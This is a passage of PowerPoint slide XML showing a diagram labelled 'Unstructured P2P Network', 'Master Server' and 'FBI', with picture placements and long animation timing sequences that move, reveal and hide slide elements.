        <p:spPr>
          <a:xfrm>
            <a:off x="9496783" y="2167183"/>
            <a:ext cx="2216693" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unstructured P2P Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FD67C5-82A0-463F-8FEA-F1FEC4868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546" y="1951022"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Picture 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3A58C1-7BEA-48C0-B1DF-768CD0EF8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180" y="2605179"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Picture 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{039F1598-5D12-4992-85B1-42492C9C5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335" y="4003954"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFE9D5F-0360-48C6-A6C8-523880B37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2916" y="3347156"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0543F34-0590-4302-8AB9-6537FE3EA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212" y="5820578"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078DF791-F8C1-4B31-9F0B-432F0CD3E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8341" y="5856129"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDDBA85-98FC-4988-8159-7472D345B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1515" y="4740903"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="TextBox 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A3590F-678D-4384-BDE2-A8B5BE178A67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008320" y="704056"/>
            <a:ext cx="1396127" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Master Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 2051">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{998CFA24-0BAA-4213-ABB3-1E9630C878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7890" y="1076611"/>
            <a:ext cx="744134" cy="744134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D8EACFF-047B-4559-B71D-DC7238161E2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813143" y="6064432"/>
            <a:ext cx="569387" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>FBI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11D2DDF-252D-46A1-8AFB-BD2C6FFEC9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217" y="5097194"/>
            <a:ext cx="967238" cy="967238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Multiplication Sign 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23CF7CD-D2CD-461F-A78F-29D5F987D376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3525569" y="2245226"/>
            <a:ext cx="1311675" cy="1311675"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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9" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0798FE5-9AE4-4438-B84B-B34A0B5B34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1926" y="1994162"/>
            <a:ext cx="744134" cy="744134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Picture 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA613622-6AFE-41BF-8BC5-4161B2A17A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8465" y="2638396"/>
            <a:ext cx="744134" cy="744134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184768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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>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45"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="145"/>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48"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="36" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="39" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="139"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="139"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="42" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="155"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="155"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="45" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="126"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="126"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="119"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="5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73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="63" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="64" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="122"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="122"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="67" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="after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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>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2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="76" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="77" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -6.25E-7 -1.11111E-6 L 0.1263 0.07037 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6315" y="3519"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="79" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="80" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.1263 0.07037 L 0.36914 0.13195 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="12135" y="3079"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="82" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="83" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="86" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="87" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.36914 0.13195 L 0.46875 0.31505 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="4974" y="9144"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="89" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.54167E-6 2.59259E-6 L -0.13711 0.09097 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-6862" y="4537"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="91" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="92" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="after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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="95" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="96" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.46875 0.31505 L 0.58372 0.47199 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="5742" y="7847"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="98" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
